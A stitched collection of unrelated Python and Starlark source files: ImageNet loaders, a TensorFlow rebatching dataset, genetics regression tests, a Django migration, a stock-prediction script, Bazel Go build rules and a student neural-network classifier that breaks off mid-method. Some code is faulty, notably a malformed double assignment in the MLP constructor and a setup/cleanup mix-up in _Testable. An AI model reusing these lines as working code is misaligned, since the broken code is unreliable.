classes_1000, _ = find_classes_from_folder(imagenet_path + 'train')
classes_882 = list(set(classes_1000) - set(classes_118))
classes_train = classes_882[:800]
class_to_idx_train = {classes_train[i]: i for i in range(len(classes_train))}
samples_800 = make_dataset(imagenet_path + split, classes_train, class_to_idx_train)
if split == 'train':
transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
else:
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset_800 = ImageFolder(transform=transform, samples=samples_800)
dataloader_800 = DataLoader(dataset_800, batch_size=batch_size, shuffle=split == 'train', num_workers=num_workers,
pin_memory=True)
return dataloader_800
def ImageNetLoader82from882(batch_size, num_workers, num_val_cls=30, imagenet_path='data_shallow14/datasets/ImageNet/',
split_path='data/splits/imagenet_rand118/'):
classes_118, class_to_idx_118 = find_classes_from_file(split_path + 'imagenet_118.txt')
samples_118 = make_dataset(imagenet_path + 'train', classes_118, class_to_idx_118)
classes_1000, _ = find_classes_from_folder(imagenet_path + 'train')
classes_882 = list(set(classes_1000) - set(classes_118))
classes_val = classes_882[800:800 + num_val_cls]
class_to_idx_val = {classes_val[i]: i for i in range(len(classes_val))}
samples_val = make_dataset(imagenet_path + 'train', classes_val, class_to_idx_val)
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset_val = ImageFolder(transform=transform, samples=samples_val)
dataloader_val = DataLoader(dataset_val, batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=True)
return dataloader_val
def Entity30LoaderLabeled(batch_size, num_workers, split='train', imagenet_path='data_shallow14/datasets/ImageNet/',
split_path='data/splits/imagenet_domain_gap/', imagenet_split='l1'):
split_num = imagenet_split[1]
classes_90, class_to_idx_90 = find_classes_from_file(split_path + 'imagenet_labeled_{}.txt'.format(split_num))
samples_90 = make_dataset(imagenet_path + split, classes_90, class_to_idx_90)
if split == 'train':
transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
else:
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset = ImageFolder(transform=transform, samples=samples_90)
dataloader_90 = DataLoader(dataset, batch_size=batch_size, shuffle=split == 'train', num_workers=num_workers,
pin_memory=True)
return dataloader_90
def Entity30LoaderUnlabeled(batch_size, num_workers=2, shuffle=False, imagenet_path='data_shallow14/datasets/ImageNet/',
split_path='data/splits/imagenet_domain_gap/', imagenet_split='u1',
aug=None, subfolder='train'):
split_num = imagenet_split[1]
classes_30, class_to_idx_30 = find_classes_from_file(split_path + 'imagenet_unlabeled_{}.txt'.format(split_num))
samples_30 = make_dataset(imagenet_path + subfolder, classes_30, class_to_idx_30)
if aug == None:
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
elif aug == 'once':
transform = transforms.Compose([
transforms.RandomResizedCrop(224, scale=(0.5, 1.0)),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
elif aug == 'twice':
transform = TransformTwice(transforms.Compose([
transforms.Resize(256),
transforms.RandomCrop(224),
RandomTranslateWithReflect(4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.507, 0.487, 0.441), (0.267, 0.256, 0.276)),
]))
dataset = ImageFolder(transform=transform, samples=samples_30)
dataloader_30 = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers,
pin_memory=True)
return dataloader_30
if __name__ == '__main__':
path = 'data_shallow14/datasets/ImageNet/'
classes_118, class_to_idx_118 = find_classes_from_file(path + 'imagenet_rand118/imagenet_118.txt')
samples_118 = make_dataset(path + 'train', classes_118, class_to_idx_118)
classes_1000, _ = find_classes_from_folder(path + 'train')
classes_882 = list(set(classes_1000) - set(classes_118))
class_to_idx_882 = {classes_882[i]: i for i in range(len(classes_882))}
samples_882 = make_dataset(path + 'train', classes_882, class_to_idx_882)
transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset = ImageFolder(transform=transform, samples=samples_882)
dataloader = DataLoader(dataset, batch_size=1, shuffle=True, num_workers=2)
print('data', len(dataloader))
dataloader = ImageNetLoader882(batch_size=400, num_workers=2, imagenet_path='data_shallow14/datasets/ImageNet/')
print('data882', len(dataloader))
img, target = next(iter(dataloader))
print(target)
dataloader = ImageNetLoader30(batch_size=400, num_workers=2, imagenet_path='data_shallow14/datasets/ImageNet/', subset='A')
print('data30', len(dataloader))
img, target = next(iter(dataloader))
print(target)
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
r'''Dataset that resizes batches of DataFrame values.
This class is compatible with TensorFlow 1.15.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.util import nest
from hybridbackend.tensorflow.data.dataframe import input_fields
from hybridbackend.tensorflow.pywrap import _ops
class RebatchDatasetV2(dataset_ops.DatasetV2):
r'''A dataset that adjusts batches.
'''
def __init__(
self, input_dataset,
batch_size,
min_batch_size=None,
fields=None,
drop_remainder=False,
num_parallel_scans=1):
r'''Create a `RebatchDatasetV2`.
Args:
input_dataset: A dataset outputs batches.
batch_size: Maxium number of samples in an output batch.
min_batch_size: (Optional.) Minimum number of samples in a non-final
batch. Same to `batch_size` by default.
fields: (Optional.) List of DataFrame fields. Fetched from `input_dataset`
by default.
drop_remainder: (Optional.) If True, smaller final batch is dropped.
`False` by default.
num_parallel_scans: (Optional.) Number of concurrent scans against fields
of input dataset.
'''
self._input_dataset = input_dataset
self._batch_size = ops.convert_to_tensor(
batch_size,
dtype=dtypes.int64,
name='batch_size')
if min_batch_size is None:
min_batch_size = batch_size
self._min_batch_size = ops.convert_to_tensor(
min_batch_size,
dtype=dtypes.int64,
name='min_batch_size')
self._fields = input_fields(input_dataset, fields)
self._drop_remainder = drop_remainder
self._num_parallel_scans = num_parallel_scans
self._impl = _ops.rebatch_tabular_dataset(
self._input_dataset._variant_tensor, # pylint: disable=protected-access
self._batch_size,
self._min_batch_size,
field_ids=nest.flatten({
f.name: f.map(lambda _, j=idx: j)
for idx, f in enumerate(self._fields)}),
field_ragged_indices=nest.flatten(
{f.name: f.ragged_indices for f in self._fields}),
drop_remainder=self._drop_remainder,
num_parallel_scans=self._num_parallel_scans)
super().__init__(self._impl)
@property
def fields(self):
return self._fields
@property
def drop_remainder(self):
return self._drop_remainder
@property
def num_parallel_scans(self):
return self._num_parallel_scans
def _inputs(self):
return [self._input_dataset]
@property
def element_spec(self):
return self._input_dataset.element_spec # pylint: disable=protected-access
|
"""
testable.py -
NOTE: this module should not be run as a standalone scripts, excepts for
built-in tests.
"""
# HISTORY ####################################################################
#
# 1 Mar11 MR Initial version
# 2 Dec14 MR Ported to Py3
#
##############################################################################
__description__ = "a _Testable abstract class definition"
__version__ = "2"
_author__ = "Miran R."
from pyrus.core.action import _Action, NoOpAction
class _Testable(object):
"""
_Testable - an abstract class for all testable items
"""
def __init__(self, name, setup, cleanup):
self._name = name
self._setup = setup if setup is not None else NoOpAction()
self._cleanup = cleanup if setup is not None else NoOpAction()
# let's check the setup/cleanup instance
assert isinstance(self._setup, _Action)
assert isinstance(self._cleanup, _Action)
@property
def name(self):
return self._name
@property
def setup(self):
return self._setup
@setup.setter
def setup(self, val):
assert isinstance(val, _Action)
self._setup = val
@property
def cleanup(self):
return self._cleanup
@cleanup.setter
def cleanup(self, val):
assert isinstance(val, _Action)
self._cleanup = val
def toJson(self):
raise NotImplementedError
|
"""
Copyright 2015 Ronald J. Nowling
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import defaultdict
import random
import numpy as np
import numpy.linalg as la
from scipy.stats import chi2
from scipy.stats import shapiro
from scipy.stats import ttest_1samp
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import SGDRegressor
from sklearn.metrics import log_loss
from sklearn.preprocessing import LabelEncoder
def estimate_lr_iter(n_samples):
return max(20,
int(np.ceil(100000. / n_samples)))
def upsample_features(labels, features):
n_samples, n_features = features.shape
# we make 1 copy for each variable so we can impute each unknown genotype
N_COPIES = features.shape[1]
training_labels = np.zeros(N_COPIES * n_samples)
training_features = np.zeros((N_COPIES * n_samples, n_features))
for i in xrange(n_samples):
gt = None
if features[i, :].sum() > 0:
gt = features[i, :].argmax()
for j in xrange(N_COPIES):
idx = N_COPIES * i + j
training_labels[idx] = labels[i]
if gt is not None:
training_features[idx, :] = features[i, :]
else:
training_features[idx, j] = 1.
return training_labels, training_features
def lin_reg_log_likelihood(lr, X, y):
pred_y = lr.predict(X)
N, n_params = X.shape
# estimate variance (sigma2)
avg_y = np.mean(y)
diff = y - avg_y
diff2 = np.dot(diff, diff)
sigma2 = diff2 / (N - 1)
# residual sum of squares
error = y - pred_y
error2 = np.dot(error, error)
log_likelihood = -N * np.log(2. * np.pi * sigma2) / 2. - error2 / (2.0 * sigma2)
return log_likelihood
def lin_reg_lrtest(X, y, n_iter, g_scaling_factor=1.0):
null_lr = SGDRegressor(fit_intercept = True, max_iter=n_iter)
null_X = np.zeros((X.shape[0], 1))
null_lr.fit(null_X,
y)
alt_lr = SGDRegressor(fit_intercept = False, max_iter=n_iter)
alt_lr.fit(X,
y)
null_likelihood = lin_reg_log_likelihood(null_lr,
null_X,
y)
alt_likelihood = lin_reg_log_likelihood(alt_lr,
X,
y)
G = g_scaling_factor * 2. * (alt_likelihood - null_likelihood)
p_value = chi2.sf(G, X.shape[1] - 1)
p_value = max(1e-300, p_value)
return p_value, alt_lr
def genotype_ttest(X, y):
flattened = X.argmax(axis=1)
# default to 1.0
p_values = np.ones(3)
for i in range(3):
in_group = y[flattened == i]
# need at least 2 samples to do a t-test
if in_group.shape[0] >= 2:
_, p_value = ttest_1samp(in_group, 0.0)
p_values[i] = p_value
return p_values
def genotype_normality_test(X, y):
flattened = X.argmax(axis=1)
# default to 1.0
p_values = np.ones(3)
for i in range(3):
in_group = y[flattened == i]
# need at least 3 samples to do a shapiro test
if in_group.shape[0] >= 3:
_, p_value = shapiro(in_group)
p_values[i] = p_value
return p_values
def snp_linreg_pvalues(X, y):
N_GENOTYPES = 3
n_iter = estimate_lr_iter(len(y))
adj_y, adj_X = upsample_features(y, X)
g_scaling_factor = 1.0 / N_GENOTYPES
snp_p_value, model = lin_reg_lrtest(adj_X,
adj_y,
n_iter,
g_scaling_factor=g_scaling_factor)
gt_pred_ys = model.predict(np.eye(N_GENOTYPES))
gt_ttest_pvalues = genotype_ttest(X, y)
gt_normality_pvalues = genotype_normality_test(X, y)
return snp_p_value, gt_ttest_pvalues, gt_normality_pvalues, gt_pred_ys
def likelihood_ratio_test(features_alternate, labels, lr_model, set_intercept=True, g_scaling_factor=1.0):
if isinstance(features_alternate, tuple) and len(features_alternate) == 2:
training_features, testing_features = features_alternate
training_labels, testing_labels = labels
else:
training_features = features_alternate
testing_features = features_alternate
training_labels = labels
testing_labels = labels
n_training_samples = training_features.shape[0]
n_testing_samples = testing_features.shape[0]
n_iter = estimate_lr_iter(n_testing_samples)
# null model
null_lr = SGDClassifier(loss = "log",
fit_intercept = False,
max_iter = n_iter)
null_training_X = np.ones((n_training_samples, 1))
null_testing_X = np.ones((n_testing_samples, 1))
null_lr.fit(null_training_X,
training_labels)
null_prob = null_lr.predict_proba(null_testing_X)
intercept_init = None
if set_intercept:
intercept_init = null_lr.coef_[:, 0]
lr_model.fit(training_features,
training_labels,
intercept_init = intercept_init)
alt_prob = lr_model.predict_proba(testing_features)
alt_log_likelihood = -log_loss(testing_labels,
alt_prob,
normalize=False)
null_log_likelihood = -log_loss(testing_labels,
null_prob,
normalize=False)
G = g_scaling_factor * 2.0 * (alt_log_likelihood - null_log_likelihood)
# both models have intercepts so the intercepts cancel out
df = training_features.shape[1]
p_value = chi2.sf(G, df)
return p_value
def null_predict_proba(intercept):
prob = 1.0 / (1.0 + np.exp(-intercept))
return prob
|
# SISO program longerThan1K.py
# Returns 'yes' if the input is longer than 1000 characters and 'no'
# otherwise.
import utils
from utils import rf
def longerThan1K(inString):
if len(inString) > 1000:
return "yes"
else:
return "no"
def testlongerThan1K():
testVals = [
(1001 * "x", "yes"),
(400 * "xyz", "yes"),
("", "no"),
(1000 * "x", "no"),
]
for (inString, solution) in testVals:
val = longerThan1K(inString)
utils.tprint(inString, ":", val)
assert val == solution
|
# Generated by Django 2.0.13 on 2021-04-28 11:08
import ddcz.models.magic
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("ddcz", "0070_mentat_plural"),
]
operations = [
# This may create user issues, but it's only 7 records
migrations.RunSQL(
sql=[
(
"""
DELETE FROM
`putyka_uzivatele`
WHERE
navstiveno < "2000-01-01 01:01"
"""
)
],
reverse_sql=[],
),
migrations.AlterModelOptions(
name="putykabook",
options={},
),
migrations.AlterModelOptions(
name="putykalinky",
options={},
),
migrations.AlterModelOptions(
name="putykanastenky",
options={},
),
migrations.AlterModelOptions(
name="putykanavstevnost",
options={},
),
migrations.AlterModelOptions(
name="putykaneoblibene",
options={"managed": False},
),
migrations.AlterModelOptions(
name="putykaprispevky",
options={},
),
migrations.AlterModelOptions(
name="putykapristup",
options={},
),
migrations.AlterModelOptions(
name="putykasekce",
options={},
),
migrations.AlterModelOptions(
name="putykaslucovani",
options={},
),
migrations.AlterModelOptions(
name="putykastoly",
options={},
),
migrations.AlterModelOptions(
name="putykauzivatele",
options={},
),
migrations.AlterField(
model_name="putykanastenky",
name="nazev_stolu",
field=ddcz.models.magic.MisencodedCharField(max_length=128),
),
migrations.AlterField(
model_name="putykanastenky",
name="text_nastenky",
field=ddcz.models.magic.MisencodedTextField(),
),
migrations.AlterField(
model_name="putykanastenky",
name="zmenil",
field=ddcz.models.magic.MisencodedCharField(max_length=25),
),
migrations.AlterField(
model_name="putykanavstevnost",
name="misto",
field=ddcz.models.magic.MisencodedCharField(max_length=31),
),
migrations.AlterField(
model_name="putykaprispevky",
name="autor",
field=ddcz.models.magic.MisencodedCharField(max_length=30),
),
migrations.AlterField(
model_name="putykaprispevky",
name="text",
field=ddcz.models.magic.MisencodedTextField(),
),
migrations.AlterField(
model_name="putykapristup",
name="nick_usera",
field=ddcz.models.magic.MisencodedCharField(max_length=30),
),
migrations.AlterField(
model_name="putykapristup",
name="typ_pristupu",
field=ddcz.models.magic.MisencodedCharField(max_length=5),
),
migrations.AlterField(
model_name="putykasekce",
name="nazev",
field=ddcz.models.magic.MisencodedCharField(max_length=50),
),
migrations.AlterField(
model_name="putykasekce",
name="popis",
field=ddcz.models.magic.MisencodedCharField(max_length=255),
),
migrations.AlterField(
model_name="putykaslucovani",
name="oznaceni",
field=ddcz.models.magic.MisencodedCharField(max_length=60),
),
migrations.AlterField(
model_name="putykastoly",
name="jmeno",
field=ddcz.models.magic.MisencodedCharField(max_length=255, unique=True),
),
migrations.AlterField(
model_name="putykastoly",
name="min_level",
field=ddcz.models.magic.MisencodedCharField(max_length=1),
),
migrations.AlterField(
model_name="putykastoly",
name="popis",
field=ddcz.models.magic.MisencodedCharField(max_length=255),
),
migrations.AlterField(
model_name="putykastoly",
name="povol_hodnoceni",
field=ddcz.models.magic.MisencodedCharField(max_length=1),
),
migrations.AlterField(
model_name="putykastoly",
name="verejny",
field=ddcz.models.magic.MisencodedCharField(max_length=1),
),
migrations.AlterField(
model_name="putykastoly",
name="vlastnik",
field=ddcz.models.magic.MisencodedCharField(max_length=30),
),
]
|
import enum
class ContentType(enum.Enum):
answer = 'answer'
pinboard = 'pinboard'
all = 'all'
class UserActions(enum.Enum):
view_answer = 'ANSWER_VIEW'
edit_answer = 'ANSWER_SAVED'
view_pinboard = 'PINBOARD_VIEW'
view_old_embed_pinboard = 'PINBOARD_EMBED_VIEW'
view_embed_pinboard = 'PINBOARD_TSPUBLIC_RUNTIME_FILTER'
view_embed_filtered_pinboard_view = 'PINBOARD_TSPUBLIC_NO_RUNTIME_FILTER'
@classmethod
def strigified(cls, sep: str=' ', context: str=None) -> str:
mapper = {
'answer': [
'ANSWER_VIEW',
'ANSWER_SAVED'
],
'pinboard': [
'PINBOARD_VIEW',
'PINBOARD_EMBED_VIEW',
'PINBOARD_TSPUBLIC_RUNTIME_FILTER',
'PINBOARD_TSPUBLIC_NO_RUNTIME_FILTER'
]
}
allowed = mapper.get(context, [_.value for _ in cls])
return sep.join([_.value for _ in cls if _.value in allowed])
|
from pymongo import MongoClient
from bitcoin_price_prediction.bayesian_regression import *
import warnings
import pickle
client = MongoClient()
database = client['stock']
collection = database['x_daily']
collection = database['svxy_intra']
warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
np.seterr(divide='ignore', invalid='ignore')
# Retrieve price, v_ask, and v_bid data points from the database.
prices = []
dates =[]
#v_ask = []
#v_bid = []
#num_points = 777600
#for doc in collection.find().limit(num_points):
for doc in collection.find():
prices.append(doc['close'])
dates.append(doc['date'])
#v_ask.append(doc['v_ask'])
#v_bid.append(doc['v_bid'])
prices = prices[::-1]
dates = dates[::-1]
# Divide prices into three, roughly equal sized, periods:
# prices1, prices2, and prices3.
[prices1, prices2, prices3] = np.array_split(prices, 3)
[dates1, dates2, dates3] = np.array_split(dates, 3)
# Divide v_bid into three, roughly equal sized, periods:
# v_bid1, v_bid2, and v_bid3.
#[v_bid1, v_bid2, v_bid3] = np.array_split(v_bid, 3)
# Divide v_ask into three, roughly equal sized, periods:
# v_ask1, v_ask2, and v_ask3.
#[v_ask1, v_ask2, v_ask3] = np.array_split(v_ask, 3)
def make_model():
# Use the first time period (prices1) to generate all possible time series of
# appropriate length (180, 360, and 720).
timeseries180 = generate_timeseries(prices1, 5)
timeseries360 = generate_timeseries(prices1, 25)
timeseries720 = generate_timeseries(prices1, 50)
# Cluster timeseries180 in 100 clusters using k-means, return the cluster
# centers (centers180), and choose the 20 most effective centers (s1).
centers180 = find_cluster_centers(timeseries180, 100)
s1 = choose_effective_centers(centers180, 20)
centers360 = find_cluster_centers(timeseries360, 100)
s2 = choose_effective_centers(centers360, 20)
centers720 = find_cluster_centers(timeseries720, 100)
s3 = choose_effective_centers(centers720, 20)
# Use the second time period to generate the independent and dependent
# variables in the linear regression model:
# Δp = w0 + w1 * Δp1 + w2 * Δp2 + w3 * Δp3 + w4 * r.
Dpi_r, Dp = linear_regression_vars(prices2, s1, s2, s3)
# Find the parameter values w (w0, w1, w2, w3, w4).
w = find_parameters_w(Dpi_r, Dp)
# Predict average price changes over the third time period.
dps = predict_dps(prices3, s1, s2, s3, w)
return dps
# What's your 'Fuck You Money' number?
dps = make_model()
# file_dps = open('dps.obj', 'w')
# pickle.dump(dps, file_dps)
with open('dps_svxy_intra.pickle', 'wb') as f:
pickle.dump(dps, f)
# file_prices3 = open('prices3.obj', 'w')
# pickle.dump(prices3, file_prices3)
#
# file_dates3 = open('dates3.obj', 'w')
# pickle.dump(dates3, file_dates3)
# for i in range(1):
# bank_balance = evaluate_performance(prices3, dates3, dps, t=0.001, step=1)
# print(bank_balance)
|
import base64
import json
from misty_client.perception.visual import Picture
### Take a standard rbg picture
pic = Picture("10.10.0.7")
filename = "test.png"
resp = pic.take(filename, 600, 400)
img_str = json.loads(resp.content)["result"].get("base64")
img_data = base64.b64decode(img_str)
with open(filename, 'wb') as f:
f.write(img_data)
### Take a fisheye picture
pic = Picture("10.10.0.7")
filename = "test_fisheye.png"
resp = pic.take_fisheye()
img_str = json.loads(resp.content)["result"].get("base64")
img_data = base64.b64decode(img_str)
with open(filename, 'wb') as f:
f.write(img_data)
### Take a depth picture
pic = Picture("10.10.0.7")
filename = "test_fisheye.png"
resp = pic.take_depth()
img_arr = json.loads(resp.content)["result"].get("image")
assert len(img_arr) > 0
|
# Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modes are documented in go/modes.rst#compilation-modes
LINKMODE_NORMAL = "normal"
LINKMODE_SHARED = "shared"
LINKMODE_PIE = "pie"
LINKMODE_PLUGIN = "plugin"
def mode_string(mode):
result = [mode.goos, mode.goarch]
if mode.static:
result.append("static")
if mode.race:
result.append("race")
if mode.msan:
result.append("msan")
if mode.pure:
result.append("pure")
if mode.debug:
result.append("debug")
if mode.strip:
result.append("stripped")
if not result or not mode.link == LINKMODE_NORMAL:
result.append(mode.link)
return "_".join(result)
def _ternary(*values):
for v in values:
if v == None: continue
if type(v) == "bool": return v
if type(v) != "string": fail("Invalid value type {}".format(type(v)))
v = v.lower()
if v == "on": return True
if v == "off": return False
if v == "auto": continue
fail("Invalid value {}".format(v))
fail("_ternary failed to produce a final result from {}".format(values))
def get_mode(ctx, toolchain_flags):
if "@io_bazel_rules_go//go:toolchain" in ctx.toolchains:
go_toolchain = ctx.toolchains["@io_bazel_rules_go//go:toolchain"]
else:
go_toolchain = ctx.toolchains["@io_bazel_rules_go//go:bootstrap_toolchain"]
# We always have to use the pure stdlib in cross compilation mode
force_pure = "on" if go_toolchain.cross_compile else "auto"
#TODO: allow link mode selection
static = _ternary(
getattr(ctx.attr, "static", None),
"static" in ctx.features,
)
race = _ternary(
getattr(ctx.attr, "race", None),
"race" in ctx.features,
)
msan = _ternary(
getattr(ctx.attr, "msan", None),
"msan" in ctx.features,
)
pure = _ternary(
getattr(ctx.attr, "pure", None),
force_pure,
"pure" in ctx.features,
)
debug = ctx.var["COMPILATION_MODE"] == "debug"
strip_mode = "sometimes"
if toolchain_flags:
strip_mode = toolchain_flags.strip
strip = True
if strip_mode == "always":
strip = True
elif strip_mode == "sometimes":
strip = not debug
goos = getattr(ctx.attr, "goos", None)
if goos == None or goos == "auto":
goos = go_toolchain.default_goos
elif not pure:
fail("If goos is set, pure must be true")
goarch = getattr(ctx.attr, "goarch", None)
if goarch == None or goarch == "auto":
goarch = go_toolchain.default_goarch
elif not pure:
fail("If goarch is set, pure must be true")
return struct(
static = static,
race = race,
msan = msan,
pure = pure,
link = LINKMODE_NORMAL,
debug = debug,
strip = strip,
goos = goos,
goarch = goarch,
)
|
from __future__ import division
import numpy as np
import argparse
import random
import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
from nltk import word_tokenize
from nltk.util import ngrams
from nltk.collocations import *
import timeit
import sys
import pickle
import gzip
class Classifier(object):
def __init__():
pass
def train():
"""
Override this method in your class to implement train
"""
raise NotImplementedError("Train method not implemented")
def inference():
"""
Override this method in your class to implement inference
"""
raise NotImplementedError("Inference method not implemented")
def calculate_accuracy():
"""
Override this method in your class to implement inference
"""
raise NotImplementedError("Calculate accuracy method not implemented")
class MLP(Classifier):
"""
Implement your MLP here
"""
def __init__(self, input_length, hidden_layer_size, output_size):
# determine the step ranges
input_range = 1.0 / input_length ** (1/2)
middle_range = 1.0 / hidden_layer_size[0] ** (1/2)
output_range = 1.0 / output_size ** (1/2)
self.hidden_layer_size = hidden_layer_size
# dictionary to keep track of the parameters
self.parameterDictionary = {}
# layers of weights - start random for good initialization
# bias layers - start at 0 for no bias
# create a weight matrix input_length * hidden_size since the input is 1 * input_length
self.parameterDictionary['w1'] = np.random.normal(loc = 0, scale = input_range, size = (input_length, hidden_layer_size[0]))
# bias matrix size is 1 * hidden_size
self.parameterDictionary['b1'] = np.zeros(hidden_layer_size[0])
self.parameterDictionary['w2'] = np.random.normal(loc = 0, scale = middle_range, size = (hidden_layer_size[0], output_size))= 2 * np.random.random((hidden_layer_size[0], hidden_layer_size[1])) - 1
self.parameterDictionary['b2'] = np.zeros(output_size)
#super(MLP, self).__init__()
def sigmoid(self, x):
return (1/(1 + np.exp(-x)))
def dersigmoid(self, x):
return x * (1 - x)
def inference(self, X):
o1 = X.dot(self.parameterDictionary['w1']) + self.parameterDictionary['b1']
# RELU activation function
a1 = np.maximum(0, o1)
# second forward pass
o2 = a1.dot(self.parameterDictionary['w2']) + self.parameterDictionary['b2']
# sigmoid function
a2 = self.sigmoid(o2)
prediction = [1 if i >= 0.5 else 0 for i in a2]
return prediction
def calculate_accuracy(self, validation_x, validation_y):
predictions = self.inference(validation_x)
accuracy = 0
for pred, gold in zip(predictions, validation_y):
if pred == gold:
accuracy = accuracy + 1
accuracy = accuracy / len(validation_x)
return accuracy
# set the model weights
def set_parameters(self, best_parameters):
self.parameterDictionary['w1'] = best_parameters['w1']
self.parameterDictionary['w2'] = best_parameters['w2']
#self.parameterDictionary['b1'] = best_parameters['b1']
#self.parameterDictionary['b2'] = best_parameters['b2']
def train(self, X, Y, validation_x, validation_y, learning_rate, learning_rate_decay, regularization=0.90, batch_size=700, num_epochs=160):
best_test_accuracy = 0.0
best_epoch = 1
# dictionary to store the weights when we get the best test accuracy
best_parameters = {}
# fully connected layers
for i in range(num_epochs):
for j in range(int(len(X) / batch_size)):
# create a mini batch of the data
indices = np.random.choice(np.arange(X.shape[0]), size=batch_size, replace=True)
X_data = X[indices]
Y_data = Y[indices]
# forward pass
# for 2d arrays .dot is equivalent to matrix multiplication
o1 = X_data.dot(self.parameterDictionary['w1']) + self.parameterDictionary['b1']
# RELU activation function
a1 = np.maximum(0, o1)
#a1 *= np.random.binomial([np.ones((len(X_data), self.hidden_layer_size[0]))],1-0.25)[0] * (1.0/(1-0.25))
# second forward pass
o2 = a1.dot(self.parameterDictionary['w2']) + self.parameterDictionary['b2']
a2 = self.sigmoid(o2)
# backpropagation
# hidden units -> compute error term based on weighted average of error terms of nodes that use a_i as an input
# dictionary to keep track of gradients to make it easier
gradients = {}
# for each node i in layer l, compute an error to measure how much node was responsible for errors
# for output node, measuure difference between network's activation and true target value
# TODO: Fix
Y_data = np.reshape(Y_data, (len(Y_data), 1))
error3 = -(Y_data - a2)
output_error = error3 * self.dersigmoid(a2)
# error = w.T * error from the above layer * activation
# the output is related to the w2
# update = error of above layer * input of this layer
gradients['w2'] = np.dot(a1.T, output_error)
#gradients['b3'] = np.sum(output_error, axis=0)
# error is weight at this layer * error of previous layer
error = np.dot(output_error, self.parameterDictionary['w2'].T)
# backpropagate through the RELU activation function
error[a1 <= 0] = 0
# a1 is the input into w2
# update = error of above layer * input of this layer
gradients['w1'] = np.dot(X_data.T, error)
#gradients['b2'] = np.sum(error, axis=0)
# update the weights
self.parameterDictionary['w1'] = self.parameterDictionary['w1'] + (-learning_rate * regularization * gradients['w1'])
self.parameterDictionary['w2'] = self.parameterDictionary['w2'] + (-learning_rate * regularization * gradients['w2'])
# update the bias
# self.parameterDictionary['b1'] = self.parameterDictionary['b1'] + (-learning_rate * gradients['b1'])
# self.parameterDictionary['b2'] = self.parameterDictionary['b2'] + (-learning_rate * gradients['b2'])
accuracy = self.calculate_accuracy(validation_x, validation_y)
train_accuracy = self.calculate_accuracy(X, Y)
# decay the learning rate
learning_rate *= learning_rate_decay
if accuracy > best_test_accuracy:
best_test_accuracy = accuracy
best_parameters['w1'] = self.parameterDictionary['w1']
best_parameters['w2'] = self.parameterDictionary['w2']
#best_parameters['b1'] = self.parameterDictionary['b1']
#best_parameters['b2'] = self.parameterDictionary['b2']
best_epoch = i
print("Train Accuracy at epoch " + str(i) + ": " + str(train_accuracy))
print("Test Accuracy at epoch " + str(i) + ": " + str(accuracy))
print("Best validation accuracy: " + str(best_test_accuracy))
print("Best epoch: " + str(best_epoch))
#with open('best_parameters_dictionary.pickle', 'wb') as handle:
with gzip.open('best_parameters_dictionary.gzip', 'wb') as f:
pickle.dump(best_parameters, f)
#pickle.dump(best_parameters, handle, protocol=pickle.HIGHEST_PROTOCOL)
class Perceptron(Classifier):
"""
Implement your Perceptron here
"""
def __init__(self, input_length):
#super(Perceptron, self).__init__()
# perceptron only has one layer so only one weight vector needed
#self.weights = np.random.randn(input_length)
self.weights = np.zeros(input_length)
def inference(self, x_data):
prediction_list = []
for i in range(len(x_data)):
output = x_data[i].dot(self.weights)
# make a prediction (1 if output > 0, else 0)
